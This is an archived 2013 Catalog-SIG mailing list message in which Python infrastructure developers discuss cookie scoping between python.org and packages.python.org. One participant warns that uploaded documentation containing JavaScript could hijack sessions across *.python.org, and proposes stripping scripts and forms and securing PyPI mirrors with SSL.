[Catalog-sig] Fwd: Fwd: readthedocs.org or packages.python.org?

Jesse Noller jnoller at gmail.com
Thu Feb 7 00:38:06 CET 2013



On Feb 6, 2013, at 6:32 PM, Donald Stufft <donald.stufft at gmail.com> wrote:

> On Wednesday, February 6, 2013 at 6:26 PM, martin at v.loewis.de wrote:
>>>> No, it doesn't. Cookies for "python.org" are not available to
>>>> "packages.python.org".
>>>> It would have to be a cookie for ".python.org". We don't issue such cookies.
>>> 
>>> Regards,
>>> Martin
>> 
>>> We probably will on the new site.
>> 
>> How can you know already? It would be a mistake that's easy to avoid.
>> 
> Doesn't matter either way, they are functionally equivalent.

We at very least have to strip out JavaScript completely from uploads. And form elements; any browser things that allow local storage - the list goes on.

Even if we don't have cookies on the main site; you can hijack sessions/cookies/etc from *.python.org via a malicious upload. This probably includes the wiki. 

This doesn't even touch on the fact the pypi mirrors need to have proper ssl security in place lest different hijacking occurs as well.



> _______________________________________________
> Catalog-SIG mailing list
> Catalog-SIG at python.org
> http://mail.python.org/mailman/listinfo/catalog-sig
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/catalog-sig/attachments/20130206/988c800e/attachment.html>


More information about the Catalog-SIG mailing list